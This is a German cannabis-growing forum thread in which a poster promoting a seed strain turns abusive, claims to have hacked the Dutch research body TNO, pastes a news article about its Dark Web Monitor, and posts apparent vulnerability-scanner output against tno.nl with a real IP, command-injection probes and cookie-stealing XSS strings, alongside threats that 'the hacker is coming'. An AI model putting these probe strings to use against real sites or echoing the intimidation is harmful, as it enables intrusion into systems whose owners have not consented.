HZL = BORN! neue Sorte Outdoor

guten Tag ich bin Mitglied von w33dy Underground seeds
HZL ist eine Sorte für unsere Breitengrade und wurde von 3 Menschen entwickelt.
Forschungszeitraum = grösser 20 Jahre
Ich will hier darauf aufmerksam machen das es uns gibt!
Leider ist unserer kleinen Samenbank sehr verfolgt!!!
hmmm…alles nicht so leicht da wo wir leben,kämpfen :wink:
Forschen = Verfolgung!

Nun zu HZL
Ein Ertrags Wunder im Outdoor bereich DEUTSCHLAND & AUSTRIA & TSCHECHIEN! rest sollte getestet werden!
Test : HZL vs Hollands Hope vs Duban poison
HZL war ertragreicher und gegen Schimmel nicht so anfällig wie die beiden anderen Sorten!
Ein sehr gute fruchtige Sorte für jemanden der Outdoor Erfolge will ohne skillz!
Leider können wir es nicht so schreiben…das ganze gequake mit Kamille und Efeu geschmack!
Fruchtig & bringt dich über den Tag!
Keine brutale Indica!
Einfach gutes Ganja für den der immer & gerne raucht !

Grow Report folgt mit pic s

" ein Korn ist zu TEUER!"

HZL = BORN!
fruchtig & leicht zu growen !
WIR FAHREN ZUM CANNABIS CUP DAMIT!

& DIESES KORN WIRD OPEN SOURCE!!!

Fuck MONSANTO & DIE ANDEREN ALLE!

never give up!
& ROCK n ROLL!!!

Bitte erzählt es der Welt!
alle Informationen SOLLEN VERBREITET WERDEN es gib KEIN COPYRIGHT und anderen scheiss!

w33dy Underground seed s
be a Human!
be free!

5 „Gefällt mir“

Moin. Da bin ich mal gespannt.

4 „Gefällt mir“

Wie sollte man Hanf behandeln?
SCHLECHT!
UNTER BRENNESELN MUSS MAN NICHT EINMAL DÜNGEN!
Dieses GEWÄCHS ist UNKRAUT!
GAME OVER FÜR HANFBLÄTTER & HIGHTIMES!
ALLES IST ANDERS!
NATUR & HZL!
Bilder folgen!

Wir würden auch gerne 1000 Skunk Pflanzen anbauen um eine Cheese zu finden ;(
Bitte versteht,unsere Forschungen haben Grenzen!

Moin. Nix für ungut aber wenn ich das so lese, ist mein erster Gedankengang gewesen… „da is es paar Kiddies langweilig und sabbeln über ihre evtl. durch Zufall gekreuzte Samen klug rum“. Der Gangsta-Schreibstyle ist da auch nicht gerade förderlich!

Damit holst du hier kaum einen hinter’m Ofen hervor… mehr Infos zum Strain, der genetische Hintergrund, wie lange selektiert, sind es Regs, Fems oder Automatics etc.pp. wäre da angebracht. Falls wie behauptet geforscht wurde, liegen die Infos sicher griffbereit vor

So, behaupte ich mal frech…gibt es hier einige User, die den Status „Underground Samenbank“ auch für sich beanspruchen können :wink:

15 „Gefällt mir“

Ich glaube du verwechselst hier das Ratgeberforum mit Instagram, kann das sein ?
Nur das die Bilder noch fehlen…

1 „Gefällt mir“

GEN 5 wurde outdoor angepflanzt

hier ein paar nord vpn s

verfolgt = verfolgt und ich bin nun hier…bann = vergebens!

HZL is coming!
FRAU & MANN HZL LEBEN NEBENEINANDER!
DANEBEN NOCH EINE JACK HERER VON SENSI & EINE PASSION 1 VON DUTCH PASSION!
Bilder gibt es später auf eigener domain mit kompletto grow report!
2,50m pflanzen derzeit!
regen ist nett dieses jahr :wink:

Junge, dein Schreibstil ist so was von verwirrend!

Warum nicht hier? Diese Seite werde ich mit Sicherheit nicht besuchen…

1 „Gefällt mir“

Ggf. sogar umgehend gelöscht!!!

1 „Gefällt mir“

hmmm…was juckt das mich?
so läuft es !

Wenn einem Mann das Recht verweigert wird, das Leben zu leben, an das er glaubt, hat er keine andere Wahl, als ein Gesetzloser zu werden.


pic ist von mitte juni

w33dy wird zu allem überfluss auch noch kommen
das habt ihr jetzt davon!

Also manch einer sollte besser die Finger von Sativa lassen…

scheiss kommunisten!
jaja labert nur!
werdet mich nie mehr los!
mal sehen im herbst wie euere kleinen aussehen :wink:
HZL = COMMING !
ab zu CUP !
n00bs!
es beginnt erst alles!
nehmt es einfach mal sportlich!

um alles klar zu stellen…demokratie = scheisse!
menschenverfolgung = scheisse
tno.nl = hacked!
verfolgte menschen haben keine regeln mehr,denn die gesellschaft läst es zu menschen zu verfolgen die niemanden schaden zufügten …denkt mal darüber nach
n00bs

um eines klar zu stellen,demokratie = scheisse
FREIHEIT!

Was ist los mit dir? :rofl:

1 „Gefällt mir“

ich mache alles richtig…mach dir keine sorgen
in ein paar monaten versteht ihr
wenn nicht,egal
ich hohle mal w33dy,der kann das besser erklären

…wir treffen uns bein cannabis cup 2021!

Mach das… 20 zeichen

Dark Web Monitor: Mit neuer Software gegen Cybercrime

Die von der niederländischen Forschungsgesellschaft TNO entwickelte „Dark Web Monitor“ – Software soll die neue Basis für polizeiliche Darknet-Ermittlungen bilden. Zum Einsatz soll sie bei den Spezialisten der Zentralstelle Cybercrime Bayern (ZCB) kommen, teilt das Bayerische Staatsministerium der Justiz in einer Pressemitteilung mit.

Zentralstelle Cybercrime Bayern (ZCB) setzt auf Dark Web Monitor

Licht ins Darknet soll die neue Software „Dark Web Monitor“ von TNO künftig für Ermittler bringen. TNO wirbt für ihr Produkt, indem sie die Vorteile für die Ermittlungsarbeit herausstreichen:

„DWM ist ein Open Source Intelligence (OSINT)-Repository. Es bietet Einblicke in kriminelle und betrügerische Aktivitäten, die unter Ausnutzung des Dark Web und virtueller Vermögenswerte geschehen. Das verschlüsselte Tor-Netzwerk ist zu einem sicheren Hafen für Kriminelle geworden, die die technische Anonymität ausnutzen. Ihre kriminellen Aktivitäten reichen von Kindesmissbrauch und Drogenhandel bis hin zu groß angelegten Finanzdelikten. Diese betreffen sowohl den Cyberspace, als auch die physische Welt.

Da die opportunistischen Aktionen immer raffinierter werden, besteht daher die dringende Notwendigkeit, die Überwachungsmöglichkeiten des Dark Web zu verbessern, um einen Vorteil gegenüber diesen Kriminellen zu erlangen. DWM unterstützt Finanzinstitute, Strafverfolgungsbehörden und Cybersicherheitsbehörden. Indem sie fortschrittliche Analyseverfahren einsetzen, können sie die Kriminellen aufzuspüren, ergreifen und strafrechtlich zur Verantwortung ziehen.“

Technologie erleichtert Darknet-Recherchen

Mittels Webcrawler-Technik erfasst die Software unter anderem auch Daten, die infolge indexiert und visualisiert werden können. Außerdem kategorisiert Dark Web Monitor kriminelle Aktivitäten und stellt Zusammenhänge her. „Die Technologie erleichtert die Recherchen im Darknet durch innovative Web Crawling-Technologien und ermöglicht es Ermittlern so, zielgerichteter einzelne illegale Angebote aber auch spezifische Phänomenbereiche in den Blick zu nehmen.

TNO kooperiert bereits seit Jahren mit Polizeibehörden, wie Interpol. Im Rahmen einer Arbeitsgruppe zu Darknet und Kryptowährungen arbeiten die Zentralstelle Cybercrime Bayern (ZCB) und TNO schon seit 2018 zusammen.

Krishna Taneja, TNO Director National Security, erklärt die Notwendigkeit ihres Produkts:

„Technik verändert unsere Welt rasend schnell. Kriminelle erkennen sofort neue Möglichkeiten, wie sie das Dark Web bietet. Um diesen Bedrohungen entgegenzuwirken, sind Innovationen erforderlich.“

Am Montag (27. Juli) stellte man die „Dark Web Monitor“ – Software in München vor. Zu diesem Anlass erschienen Justizminister Georg Eisenreich (CSU), Krishna Taneja von der TNO und der Bamberger Generalstaatsanwalt Thomas Janovsky. Justizminister Georg Eisenreich (CSU) und die niederländische Forschungsgesellschaft TNO unterzeichneten dort eine Kooperationsvereinbarung.

Justizminister Eisenreich begrüßt eine solche Zusammenarbeit:

„Der Freistaat geht entschlossen gegen Cybercrime vor. Eine digital vernetzte Welt bietet große Chancen, ist aber auch verwundbar.“ […] “Die innovative Technologie des Dark Web Monitors ermöglicht uns neue technische Ansätze, um mehr Licht ins Darknet zu bringen und Täter ausfindig zu machen.”

Gemäß Eisenreich ist die Anfang 2015 bei der Generalstaatsanwaltschaft Bamberg eingerichtete ZCB mit ihren 15 Staatsanwälten und 3 IT-Spezialisten eine der größten Spezialstaatsanwaltschaften Deutschlands. Der Bamberger Generalstaatsanwalt Thomas Janovsky hebt zudem hervor, dass die Kooperation über Ländergrenzen hinweg bereits beweise, dass sich die ZCB internationales Ansehen erworben habe.

Blockquote

  • Target IP: 104.214.237.135
  • Target Hostname: tno.nl
  • Target Port: 80
  • Start Time: 2020-07-29 20:25:31 (GMT2)

  • Server: Microsoft-IIS/10.0
  • Uncommon header ‚x-ua-compatible‘ found, with contents: IE=edge
  • Uncommon header ‚x-frame-options‘ found, with contents: DENY
  • Uncommon header ‚x-content-type-option‘ found, with contents: nosniff
  • Root page / redirects to: https://www.tno.nl/
  • Uncommon header ‚request-context‘ found, with contents: appId=cid-v1:e7d0c641-c059-4c89-adf3-db2fee1732ed
  • Uncommon header ‚access-control-expose-headers‘ found, with contents: Request-Context
  • Uncommon header ‚returned-status‘ found, with contents: 200
  • /bin/awstats.pl: AWStats logfile analyzer.
  • /bin/awstats/awstats.pl: Free realtime logfile analyzer for advanced web statistics. Should be protected.
  • OSVDB-724: /bin/ans.pl?p=…/…/…/…/…/usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.
  • OSVDB-724: /bin/ans/ans.pl?p=…/…/…/…/…/usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.
  • OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  • OSVDB-3931: /myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=: myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  • OSVDB-3931: /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent: myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  • /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  • /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  • OSVDB-4598: /members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  • OSVDB-2946: /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  • OSVDB-10944: /bin/: text goes here
  • OSVDB-3299: /bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20’';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See Vulnerability Security Testing & DAST | Fortra's Beyond Security
  • 6544 items checked: 0 error(s)

und den schicke ich euch jetzt vorbei :wink:
puh…was bildet euch ihr nur ein!

Ahja… keiner bildet sich hier irgendwas ein aber mach dein Ding und lass uns unsere Ruhe bitte, danke :slight_smile:

1 „Gefällt mir“

es beginnt erst
warte nur bis der hacker kommt!
HZL wird hier beworben,ob es euch passt oder auch nicht!
kannst vergessen,hier sind wir nun und ausgeredet!

Der Kollege ist auf Eis gelegt!
Weiter geht’s mit Musik …

4 „Gefällt mir“